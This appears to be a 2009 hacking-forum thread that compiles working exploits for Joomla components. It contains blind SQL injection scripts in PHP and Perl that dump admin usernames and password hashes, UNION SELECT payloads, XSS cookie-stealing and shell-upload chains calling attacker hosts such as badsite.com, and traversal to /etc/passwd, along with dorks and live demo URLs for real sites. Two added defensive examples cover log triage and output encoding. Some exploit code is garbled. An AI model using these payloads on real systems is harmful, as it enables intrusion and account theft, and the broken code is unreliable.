$t = abs((100-($w/$r*100)));
echo "Username: ";
for ($i=1; $i <= 30; $i++) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$count = $i;
$i = 30;
}
}
for ($j = 1; $j < $count; $j++) {
for ($i = 46; $i <= 122; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 122;
}
}
}
echo "\nPassword: ";
for ($j = 1; $j <= 49; $j++) {
for ($i = 46; $i <= 102; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 102;
}
}
}
}
?>
# milw0rm.com [2009-01-15]
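The blind exploit above works by issuing one request per candidate character and comparing response lengths. Added example, not from milw0rm or the thread: a small access-log triage script for the request shapes collected in this thread (UNION SELECT, boolean conditions, substring/ascii character probing, script tags, ../ and %00 in paths, mosConfig_absolute_path overrides). The log lines are constructed; the signature regexes are assumptions tuned to the PoCs above, not a complete WAF ruleset.

```php
<?php
// Added example: triage of Apache combined-format log lines for the injection
// patterns seen in this thread. Log lines below are constructed, not real traffic.
$LOG_LINES = <<<'LOG'
203.0.113.10 - - [21/Dec/2008:10:00:01 +0000] "GET /index.php?option=com_hbssearch&task=showhoteldetails&id=4&r_type=1+and+substring(@@version,1,1)=4 HTTP/1.1" 200 5120
203.0.113.10 - - [21/Dec/2008:10:00:02 +0000] "GET /index.php?option=com_hbssearch&task=showhoteldetails&id=4&r_type=1+and+substring(@@version,1,1)=5 HTTP/1.1" 200 5120
203.0.113.10 - - [21/Dec/2008:10:00:03 +0000] "GET /index.php?option=com_eventing&catid=1+and+ascii(substring((select+username+from+jos_users+limit+0,1),1,1))%3E64-- HTTP/1.1" 200 5120
198.51.100.7 - - [21/Dec/2008:10:05:00 +0000] "GET /index.php?option=com_bibliography&func=display&catid=25&letter=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2210
198.51.100.7 - - [21/Dec/2008:10:05:10 +0000] "GET /administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=../../../../etc/passwd%00 HTTP/1.1" 200 1807
192.0.2.44 - - [21/Dec/2008:10:06:00 +0000] "GET /index.php?option=com_bibliography&func=display&catid=25&letter=B HTTP/1.1" 200 2210
LOG;

// Signature table (assumed, derived from the PoCs in this thread): name => regex
// applied to the URL-decoded request target.
const SIGNATURES = [
    'union_select'     => '/\bunion\b[\s\/\*]+(all[\s\/\*]+)?select\b/i',
    'boolean_probe'    => '/\b(and|or)\b\s+\d+\s*=\s*\d+/i',
    'char_probe'       => '/\b(substring|substr|ascii|mid)\s*\(/i',
    'script_tag'       => '/<\s*script\b/i',
    'path_traversal'   => '/(\.\.\/|\.\.\\\\|%00|\x00)/',
    'globals_override' => '/(^|[?&])(GLOBALS\[|mosConfig_absolute_path=)/i',
];

/** Parse one combined-format log line into the fields we need, or null. */
function parse_line(string $line): ?array
{
    if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)/', $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3],
            'target' => $m[4], 'status' => (int)$m[5]];
}

/** Return the names of all signatures matching a request target. */
function match_signatures(string $target): array
{
    // Decode twice: the com_search PoC later in this thread is double-encoded
    // (%253C) precisely to slip past single-decode filters. urldecode also turns
    // "+" into a space, the way the application itself sees the query string.
    $decoded = urldecode(urldecode($target));
    $hits = [];
    foreach (SIGNATURES as $name => $re) {
        if (preg_match($re, $decoded)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

/**
 * Per-IP hit counts per signature, plus a flag for sources that issue repeated
 * char_probe requests: the tell-tale of a blind, character-by-character extraction loop.
 */
function triage(string $log, int $probe_threshold = 2): array
{
    $report = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $req = parse_line($line);
        if ($req === null) continue;
        $hits = match_signatures($req['target']);
        if (!$hits) continue;
        foreach ($hits as $h) {
            $report[$req['ip']]['hits'][$h] = ($report[$req['ip']]['hits'][$h] ?? 0) + 1;
        }
        $report[$req['ip']]['targets'][] = $req['target'];
    }
    foreach ($report as $ip => &$entry) {
        $entry['blind_extraction'] = ($entry['hits']['char_probe'] ?? 0) >= $probe_threshold;
    }
    unset($entry);
    return $report;
}

foreach (triage($LOG_LINES) as $ip => $entry) {
    printf("%s: %s%s\n", $ip, json_encode($entry['hits']),
        $entry['blind_extraction'] ? '  [blind SQLi extraction pattern]' : '');
}
```

The clean request from 192.0.2.44 produces no entry; the probing source is flagged once it crosses the threshold, which is the signal worth alerting on, since single hits are noisy.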
Component: RD-Autos 1.5.2
Vulnerability: SQL Injection Vulnerability
[~] Exploit /index.php?option=com_rdautos&view=category&id=[SQL]&Itemid=54
[~] Example /index.php?option=com_rdautos&view=category&id=-1+union+select+concat(username,char(58),password)+from+jos_users--&Itemid=54
Joomla
Component: Gigcal 1.x
Vulnerability: SQL Injection Vulnerability
Exploit : http://localhost/index.php?option=com_gigcal&Itemid=78&id=-999+union+all+select+1,2,3,4,5,6,7,8,9,concat(username,char(58),password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
Component: com_pccookbook
Vulnerability: Blind SQL Injection Exploit
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " #########################################################################\n";
print " # \n";
print " # Joomla com_pccookbook Blind sql injection exploit \n";
print " # \n";
print " # Cyb3R-1sT \n";
print " # cyb3r-1st[at]hotmail.com \n";
print " # \n";
print " # Usage:perl file.pl host path <options> \n";
print " # example: perl file.pl www.host.com /joomla/ -a 7 \n";
print " # \n";
print " # Options: -a id \n";
print " # \n";
print " #########################################################################\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $aid = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "a=i");
print "[~] Exploiting...\n";
if($options{"u"})
{
$userid = $options{"u"};
}
if($options{"a"})
{
$aid = $options{"a"};
}
syswrite(STDOUT, "[~] Password: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $userid, $aid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $userid, $aid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $path = shift;
my $uid = shift;
my $aid = shift;
my $i = shift;
my $h = shift;
my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_pccookbook&page=viewrecipe&recipe_id=".$aid." and ascii(SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")";
if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}
my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "Ingredients";
if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}
Component: com_news
Vulnerability: SQL Injection Vulnerability
Exploit:
http://localhost/index.php?option=com_news&id=-148+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users--
Component: com_waticketsystem
Vulnerability: Blind SQL Injection Exploit
<?php
ini_set("max_execution_time",0);
print_r('
##############################################################################
#
# Joomla com_waticketsystem Blind SQL Injection Exploit
#
# === Cyb3R-1st ===
# cyb3r-1st@hormail.com
# == inject0r5 t3am ==
#
# usegae : php file.php "http://site/index.php?option=com_waticketsystem&act=category&catid=1"
#
##############################################################################
');
if ($argc > 1) {
$url = $argv[1];
$r = strlen(file_get_contents($url."+and+1=1--"));
echo "\nExploiting:\n";
$w = strlen(file_get_contents($url."+and+1=0--"));
$t = abs((100-($w/$r*100)));
echo "Username: ";
for ($i=1; $i <= 30; $i++) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$count = $i;
$i = 30;
}
}
for ($j = 1; $j < $count; $j++) {
for ($i = 46; $i <= 122; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 122;
}
}
}
echo "\nPassword: ";
for ($j = 1; $j <= 49; $j++) {
for ($i = 46; $i <= 102; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 102;
}
}
}
}
?>
Joomla Component beamospetition 1.0.12 SQL Injection / XSS
http://www.milw0rm.com/exploits/7847
Joomla com_pcchess (game_id) Blind SQL Injection Exploit
http://www.milw0rm.com/exploits/7846
Mambo Component SOBI2 RC 2.8.2 (bid) SQL Injection Vulnerability
http://www.milw0rm.com/exploits/7841
Joomla Com BazaarBuilder Shopping Cart v.5.0 SQL Injection Exploit
http://www.milw0rm.com/exploits/7840
Ded MustD!e
23.01.2009, 05:02
XSS
Joomla Component Reservation Manager
Version: 1.7 (last update on Oct 3, 2008)
Type: Commercial (99$)
Vulnerable parameter: year
Exploit: "><script>alert(document.cookie)</script>
Dork: "inurl:com_resman"
Demo: http://resman.webformatique.com/index.php?option=com_resman&task=moreinfo&id=1&year=2010"><script>alert(document.cookie)</script>
Joomla Component Car Manager
Version: 2.1 (last update on Jan 6, 2009)
Type: Commercial (129$)
Vulnerable parameter: msg
Exploit: "><script>alert(document.cookie)</script>
Dork: "inurl:com_carman"
Demo: http://carman.webformatique.com/index.php?option=com_carman&msg="><script>alert(document.cookie)</script>
Joomla Component Time Slot Registration
Version: 1.0.5 (last update on Mar 26, 2008)
Type: Non-Commercial
Vulnerable parameter: entity
Exploit: "><script>alert(document.cookie)</script>
Dork: "inurl:com_time_slot_registration"
Demo: http://resadon.fr/index.php?option=com_time_slot_registration&task=viewEventsList&entity="><script>alert(document.cookie)</script>
Joomla Component Hire Manager
Version: 1.2 (last update on Oct 3, 2008)
Type: Commercial (99$)
Vulnerable parameter: msg
Exploit: "><script>alert(document.cookie)</script>
Dork: "inurl:com_hireman"
Demo: http://hireman.webformatique.com/index.php?option=com_hireman&msg="><script>alert(document.cookie)</script>
Joomla Component hwdCourses beta
Version: 1.1.1 (last update on Apr 29, 2008)
Type: Non-Commercial
Vulnerable parameter: dif, type
Exploit: "><script>alert(document.cookie)</script>
Dork: "inurl:com_hwdcourses"
Demo: http://www.voc.org/index.php?option=com_hwdcourses&Itemid=114&type=Classic"><script>alert(document.cookie)</script>
Mambo com_sim v0.8 Blind SQL Injection Exploit
http://www.milw0rm.com/exploits/7860
-m0rgan-
14.02.2009, 14:03
Joomla com_flashmagazinedeluxe (mag_id) SQL Injection Vulnerability
exploit:
http://localhost/index.php?option=com_flashmagazinedeluxe&Itemid=10&task=magazine&mag_id=-4+SQL
union+select+1,2,3,unhex(hex(version())),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/*
source: http://milw0rm.com/
--------------------------------------------------------------
The End!
грамбукса
24.02.2009, 11:10
this might have been posted already.. delete it if so.
found this little site _http://www.joomlascan.com
- scanned 1.0.13 with the com_datsogallery module and it found nothing at all - maybe someone else will have better luck ;)
another tool - _http://sourceforge.net/projects/joomscan/
looks like an active project.
Dr.Frank
08.03.2009, 19:16
Component com_xevidmegafx
Sql-inj
vulnerability in the id parameter:
http://site.com/index.php?option=com_xevidmegafx&Itemid=34&func=detail&id=28{SQLINJ}
19 columns
in theory you could try +union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
but I couldn't find the fields that get displayed, so I went through it as Blind SQL
############################################
# Joomla Djice Shoutbox v 1.0 <= Permanent XSS vulnerability #
############################################
- dork: inurl:"index.php?option=com_djiceshoutbox"
The script is affected by a Permanent XSS vulnerability, so you can put in bad JavaScript code like:
"><script>alert('XaDoS')</script>
or
'">><script>alert('XSS By XaDoS')</script>
the XSS become permanent in every page of site!
not critical damage but it's not funny..
[+] D3M0:
http://www.djiceatwork.com
contact me at xados @ hotmail . it
www.securitycode.it
# milw0rm.com [2009-03-10]
[+] Bugs
- [A] SQL Injection
[-] Security risk: low
[-] File affected: sub_commententry.php
This bug allows a privileged user to view username
and password of a registered user. Like all SELECT
vulnerable queries, this can be manipulated to write
files on system.
*************************************************
[+] Code
- [A] SQL Injection
http://www.site.com/path/index.php?option=com_bookjoomlas&Itemid=26&func=comment&gbid=-1 UNION ALL SELECT 1,2,NULL,4,NULL,6,7,NULL,9,CONCAT(username,0x3a,password),11,12,13,14,15,16 FROM jos_users
*************************************************
[+] Fix
No fix.
*************************************************
# milw0rm.com [2009-04-06]
#############################################################################
# #
# Joomla Component MailTo SQL Injection Vulnerability #
# #
#############################################################################
########################################
[~] Vulnerability found by: H!tm@N
[~] Contact: khghitman[at]gmail[dot]com
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, chs, redc00de
[~] -=[Kosova Hackers Group]=--=[KHG-Crew]=-
########################################
[~] ScriptName: "Joomla"
[~] Component: "MailTo (com_mailto)"
[~] Date: "April 2006"
########################################
[~] Exploit /index.php?option=com_mailto&tmpl=mailto&article=[SQL]&Itemid=1
[~] Example /index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)KHG+from+jos_users--&Itemid=1
########################################
[~] LiveDemo: http://www.itp.net/index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)KHG+from+jos_users--&Itemid=1
########################################
[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] R.I.P redc00de
########################################
----------------------------------------------------------------+
#############################################################################
# #
# Joomla Component MaianMusic SQL Injection Vulnerability #
# #
#############################################################################
########################################
[~] Vulnerability found by: H!tm@N
[~] Contact: khghitman[at]gmail[dot]com
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, chs, redc00de
[~] -=[Kosova Hackers Group]=--=[KHG-Crew]=-
########################################
[~] ScriptName: "Joomla"
[~] Component: "MaianMusic (com_maianmusic)"
[~] Version: "1.2.1"
[~] Date: "09-26-2008"
[~] Author: "Arelowo Alao & David Bennett"
[~] Author E-mail: "Alao@aretimes.com"
[~] Author URL: "www.aretimes.com"
########################################
[~] Exploit: /index.php?option=com_maianmusic&section=category&category=[SQL]&Itemid=70
[~] Example: /index.php?option=com_maianmusic&section=category&category=-1+union+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users--&Itemid=70
########################################
[~] LiveDemo: http://musicsunderground.com/index.php?option=com_maianmusic&section=category&category=-1+union+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users--&Itemid=70&lang=en
########################################
[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] R.I.P redc00de
########################################
----------------------------------------------------------------+
#############################################################################
# #
# Joomla Component Cmimarketplace Directory Traversal Vulnerability #
# #
#############################################################################
########################################
[~] Vulnerability found by: H!tm@N
[~] Contact: khghitman[at]gmail[dot]com
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, chs, redc00de
[~] -=[Kosova Hackers Group]=--=[KHG-Crew]=-
########################################
[~] ScriptName: "Joomla"
[~] Component: "Cmimarketplace (com_cmimarketplace)"
[~] Date: "August 2008"
[~] Author: "Magnetic Merchandising Inc."
[~] E-mail: "client@ijobid.com"
[~] Author URL: "www.ijobid.com"
########################################
[~] Exploit: /index.php?option=com_cmimarketplace&Itemid=70&viewit=[Directory]&cid=1
[~] Example: /index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../&cid=1
########################################
[~] Live Demo: http://democmi.ijobid.com/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../&cid=1
########################################
[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] R.I.P redc00de
########################################
© milw0rm.com [2009-04-08]
[underwater]
16.04.2009, 19:33
Today I had to deal with Joomla 1.5, started looking for exploits and found this on the official forum http://forum.joomla.org/viewtopic.php?f=300&t=371705
So I wrote a small exploit:
<?php
// Deletion of arbitrary images in the Joomla catalogue
// by [underwater]
$WEB_VULNERABLE = 'http://www.site.com/';
if(!$archive = obt_archive($WEB_VULNERABLE.'images/')){
echo '<iframe src="'.$WEB_VULNERABLE.'administrator/index.php?option=com_media&task=file.delete&tmpl=component&folder=&rm[]=index.html" width="1" height="1" frameborder="0"></iframe>';
ob_get_contents();
sleep(5);
}
if($archive= obt_archive($WEB_VULNERABLE.'images/')){
foreach($archivos as $valor){
if(eregi('/', $valor[(count($valor)-1)])){ $tipo = 'folder'; }else{ $tipo = 'file'; }
echo '<iframe src="'.
$WEB_VULNERABLE.'administrator/index.php?option=com_media&task='.$tipo
.'.delete&tmpl=component&folder=&rm[]='.urlencode($valor)
.'" width="1" height="1" frameborder="0"></iframe>';
}
}
function obt_archive($url){
$buffer = explode(']"> <a href="', file_get_contents($url));
foreach($buffer as $item=> $valor){
if($item != '0'){
$temp = explode('"', $valor);
$retorn[count($retorno)] = $temp[0];
}
}
return $retorn;
}
?>
Then I found an XSS
http://127.0.0.1/joomla/index.php?searchword=%253c%2553%2543%2572%2549%2570%2554%2520%2578%253d%2578%253e%2561%256c%2565%2572%2574%2528%2530%2530%2530%2530%2530%2529%253c%252f%2573%2543%2572%2549%2570%2554%253e&ordering=newest&searchphrase=all&option=com_search
I don't know whether this XSS had been found before me, I haven't seen it anywhere; the tastiest part is that you can upload a shell through it, here's the exploit:
<?php
error_reporting(0);
$EXPL['SITE_VULNERABLE'] = 'http://127.0.0.1/joomla/';
$EXPL['URL_COM_SHELL'] = 'http://127.0.01/shell'; // Path to the shell
$EXPL['XSS'] = '<script '.
'src="http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'].'?act=js" ></script>';
if($_GET['act'] == 'js'){
die('
var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
function base64_encode(input){
var output = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
do{
chr1 = input.charCodeAt(i++);
chr2 = input.charCodeAt(i++);
chr3 = input.charCodeAt(i++);
enc1 = chr1 >> 2;
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
enc4 = chr3 & 63;
if(isNaN(chr2)){
enc3 = enc4 = 64;
}else if(isNaN(chr3)){
enc4 = 64;
}
output = output + keyStr.charAt(enc1) + keyStr.charAt(enc2) + keyStr.charAt(enc3) + keyStr.charAt(enc4);
}while(i < input.length);
return output;
}
window.location.href="http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'].'?act=galletas&sabor=" + base64_encode(document.cookie);
');
}elseif($_GET['act'] == 'gall'){
if(!$cookies = base64_decode($_GET['sabor'])) die('<strong>Нет печенья(</strong>');
$buffer = http_get($EXPL['SITE_VULNERABLE'].'/administrator/index.php?option=com_installer', $cookies);
$buscar = expl('hidden" name="', $buffer);
foreach($buscar as $encont){
$encont = expl('"', $encont);
$encont = $encont[0];
if(strlen($encont) == 32){
$hash = $encont;
break;
}
}
$buffer = http_post(
$EXPL['SITE_VULNERABLE'].'/administrator/index.php', $cookies,
$hash.'=1&install_url='.urlencode($EXPL['URL_COM_SHELL']).'&installtype=url&task=doInstall&option=com_installer&'
);
if(eregi('200 OK', http_get($EXPL['SITIO_VULNERABLE'].'/modules/mod_artimesk/mod_artimesk.php'))){
// Operation completed successfully! shell /modules/mod_artimesk/mod_artimesk.php
header('UnderWhat?!');
$explot = true;
}else{
$explot = false;
}
if($archiv_handle = fopen('log_('.date('Y.m.d.H.i.s').')_.txt', 'x')){
if($explot){
fwrite($archiv_handle, 'Шелл успешно загружен'. URL: '.$EXPL['SITE_VULNERABLE'].'/modules/mod_artimesk/mod_artimesk.php'."\x0D\x0A");
header('location: https://forum.antichat.ru');
}else{
fwrite($archiv_handle,
.$EXPL['SITIO_VULNERABLE'].' Експлоит не может быть использован, так как не совместима версия, или у вас нету админ прав.'."\x0D\x0A");
}
fclose($archiv_handle);
}
exit($explot);
}
// Execution of arbitrary JavaScript code
$pedir = $EXPL['SITЕ_VULNERABLE'].'/index.php?searchword='.urlencode(urlencode($EXPL['XSS'])).'&ordering=&searchphrase=all&option=com_search';
if(http_get($pedir, 'null[]=token')){
header('location: '.$EXPL['SITIO_VULNERABLE'].'administrator/index.php?option=com_search');
}else{
die('hola :-s');
}
function http_post($url, $cookies, $postdata){
$timeout = 100;
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_TIMEOUT, (int)$timeout);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
curl_setopt($ch, CURLOPT_COOKIE, $cookies);
$conten = curl_exec($ch);
$error = curl_error($ch);
curl_close($ch);
if($conten)
return $conten;
else
return $error;
}
function http_get($url, $cookies){
$timeout = 100;
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_TIMEOUT, (int)$timeout);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_COOKIE, $cookies);
$conten = curl_exec($ch);
$error = curl_error($ch);
curl_close($ch);
if($conten)
return $conten;
else
return $error;
}
?>
Solide Snake
22.04.2009, 23:44
/*
RSMonials XSS Exploit
http://www.rswebsols.com/downloads/category/14-download-rsmonials-all?download=23%3Adownload-rsmonials-component
Google Dork: allinurl:option=com_rsmonials
Anything entered into the form gets rendered as HTML, so you can add tags
as long as they don't include quotes (magic quotes eats them, if it's on).
This component ships with settings that prevent posting by default, but
the administrator page for the testimonials renders your script in its entirety.
Proof of Concept 1: Remote file upload
Visit http://target.com/index.php?option=com_rsmonials and post a comment.
At the end of your glowing comment about how awesome the site is, attach this:
<script src=http://badsite.com/evil.js></script>
Now, when your admin goes to the com_rsmonials "Testimonials" page, your
script will execute. In this example, a hidden iframe loads up the install
page and installs a 'custom' module.
*/
var exploited = false;
var iframe = document.createElement( 'iframe' );
var reg = new RegExp( 'administrator' );
if( reg.test( location.href ) )
{
iframe.src = 'index.php?option=com_installer';
iframe.setStyle( 'display', 'none' );
document.body.appendChild( iframe );
iframe.addEvent( 'load', exploit );
}
function exploit( e )
{
if( exploited != true )
{
var doc = e.target.contentDocument; if( !doc ) return;
var inp = doc.getElementById( 'install_url' );
inp.value = 'http://badsite.com/exploit.zip';
var b = inp.parentNode.getElementsByTagName( 'input' )[1];
b.onclick();
exploited = true;
}
}
/*
Proof of Concept 2: New Super Administrator
Here's a drop-in replacement for the 'exploit' function above:
function exploit( e )
{
if( exploited != true )
{
var newForm = false;
var doc = e.target.contentDocument; if( !doc ) return;
var nb = doc.getElementsByTagName( 'a' ); if( !nb ) return;
var i = 0;
for( ; i<nb.length; i++ )
{
if( nb[i].parentNode.id == 'toolbar-new' )
{
nb[i].onclick();
}
else if( nb[i].parentNode.id == 'toolbar-save' )
{
doc.getElementById( 'name' ).value = 'hacked';
doc.getElementById( 'username' ).value = 'hacked';
doc.getElementById( 'email' ).value = 'your@freemail.com';
doc.getElementById( 'password' ).value = 'password';
doc.getElementById( 'password2' ).value = 'password';
var g = doc.getElementById( 'gid' );
g.selectedIndex = g.options.length - 1;
nb[i].onclick();
exploited = true;
}
}
}
}
If the admin is a Super Admin, then you could be too... just remember to watch
your freemail account for Joomla's account notification!
*/
/* jdc 2009 */
# milw0rm.com [2009-04-22]
com_dictionary
/components/com_dictionary/dictionary.php
if($wordid)//a word was selected, show its description
{
echo "<h3>Описание</h3>";
$database->setQuery("SELECT wordid,word,worddescription FROM #__dictionary where wordid=".$wordid);
$result = $database->query();
$row = mysql_fetch_object($result);
index.php?option=com_dictionary&Itemid=125&wordid=-3+union+select+1,username,password+from+jos_users
[underwater]
27.04.2009, 23:52
I read about the following vulnerability on some Spanish blog:
http://127.0.0.1/joomla/index.php?option=com_user&task=register
HTML code can be inserted into the username; there is a small filter, which is bypassed with quotes ;P
For example, something like:
number" onclick="document.location='http://www.site.com/?cookies.php?cookies='+document.cookie" x="
The rest is a matter of technique - a one-pixel image does the redirect to the evil script.
This gem lives here: /administrator/components/com_users/views/user/tmpl/form.php
The funny part is that the Joomla coders screwed up exactly the same thing in 10 more files)
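The bypass underwater describes (tags blocked, quotes not) is the usual gap between a blacklist on input and encoding for the context the value actually lands in: once the username is echoed into value="...", a quote ends the attribute and everything after it becomes new attributes. The block below is an added illustration for this post, not Joomla's code and not from the post itself; naive_filter, render_naive and render_safe are hypothetical stand-ins for a form that echoes the username into an input attribute, the sample names are constructed, and injects_attribute parses the rendered fragment with the standard-library HTML parser to see whether attributes appeared that the template never wrote.

```python
"""Tag-stripping filter versus attribute-context encoding for an echoed username.

Added example (not Joomla code). The three render/filter functions are
hypothetical stand-ins for the pattern described in the post above.
"""
import html
import re
from html.parser import HTMLParser

# The only three attributes the template itself writes.
TEMPLATE = '<input type="text" name="username" value="%s" />'


def naive_filter(username: str) -> str:
    """Hypothetical blacklist filter: strips <...> tags and nothing else."""
    return re.sub(r'<[^>]*>', '', username)


def render_naive(username: str) -> str:
    """Echo the filtered username straight into the attribute (the flawed pattern)."""
    return TEMPLATE % naive_filter(username)


def render_safe(username: str) -> str:
    """Encode for the attribute context: html.escape(quote=True) neutralises \" and '."""
    return TEMPLATE % html.escape(username, quote=True)


class _InputAttrs(HTMLParser):
    """Collect the attribute names a browser would see on the rendered <input>."""

    def __init__(self):
        super().__init__()
        self.names = []

    def handle_starttag(self, tag, attrs):
        if tag == 'input':
            self.names = [name for name, _ in attrs]


def input_attributes(fragment: str) -> list:
    """Attribute names of the <input> element in the rendered fragment."""
    parser = _InputAttrs()
    parser.feed(fragment)
    parser.close()
    return parser.names


def injects_attribute(fragment: str) -> bool:
    """True when the rendered input carries attributes the template never wrote."""
    return bool(set(input_attributes(fragment)) - {'type', 'name', 'value'})


# Constructed sample names: a normal one, a tag-based one the filter catches, and an
# attribute breakout the filter misses because it contains no angle brackets at all.
SAMPLES = {
    'plain': 'alice',
    'tag': 'bob<script>alert(1)</script>',
    'breakout': 'carol" onfocus="alert(1)" x="',
}


def compare(samples=SAMPLES) -> dict:
    """For each sample: (naive rendering leaks an attribute, encoded rendering leaks one)."""
    return {key: (injects_attribute(render_naive(value)),
                  injects_attribute(render_safe(value)))
            for key, value in samples.items()}


if __name__ == '__main__':
    for key, (naive_leaks, safe_leaks) in compare().items():
        print('%-8s naive=%s encoded=%s' % (key, naive_leaks, safe_leaks))
```

Only the breakout sample gets through the naive path, and only because the filter looks for the wrong thing; the encoded rendering keeps the whole string inside the one value attribute regardless of which characters it contains, which is why encoding at the output point is the fix rather than a longer blacklist.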
[underwater]
28.04.2009, 18:04
Clickheat [fr Joomla]
Download : http://www.recly.com/index.php?option=com_recly&task=product_page&id=1
Vuln file: install.clickheat.php
Vuln Code:
require_once($GLOBALS['mosConfig_absolute_path']. '/administrator/components/com_clickheat/Recly_Config.php');
Exploit:
http://site.com/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=..../../../../../../../etc/passwd%00
Vuln file: _main.php
Vuln Code:
require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Heatmap.php' );
Exploit:
http://site.com/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=../../../../../../../etc/passwd%00
Vuln file: main.php
Vuln Code:
require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Overview.php' );
Exploit:
